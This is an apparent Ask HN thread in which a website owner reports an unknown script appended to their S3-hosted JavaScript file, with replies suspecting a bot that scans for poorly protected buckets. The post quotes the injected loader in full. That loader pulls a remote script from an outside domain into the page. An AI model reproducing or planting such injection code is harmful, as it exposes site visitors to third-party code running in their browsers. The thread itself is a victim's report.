Ask HN: How did this tracking code get in my site's JavaScript?
I've just found this mysterious tracking code appended to the main JS file of my website:
;(function(d,s,u,t,h){d.q97W||(t=d.createElement(s),h=d.getElementsByTagName(s)[0],t.async=1,t.src=u,h.parentNode.insertBefore(t,h),d.q97W=1)})(document,'script','//abtrcking.com/a610b2befbce9062/analytics.js?4cd018b7ad0ce698d02494542e8f6e70');
Unfortunately the text was appended to a gzipped JavaScript file, which made it unreadable by browsers and effectively shut down my site.
The site is hosted on AWS and the JS file was pushed to S3 during deployment. I checked deployment logs and it definitely wasn't in the file during deployment. Does this mean someone has hacked my AWS account or has my access keys?
8 comments
[ 2.6 ms ] story [ 29.6 ms ] threadAffected files are:
https://[redacted].s3.amazonaws.com/js/scripts_2017-05-28-17...
https://[redacted].s3.amazonaws.com/js/scripts_2017-05-28-18...
According to "last modified" timestamps, the first was modified 7 minutes after upload, the second 2.4 days later.
I suppose it's possible that the bot enabled this setting, but it was probably just me being sloppy :-/ The bot probably scans for poorly-protected S3 buckets that are referenced on websites.
I hope the next victims find this post in a Google search.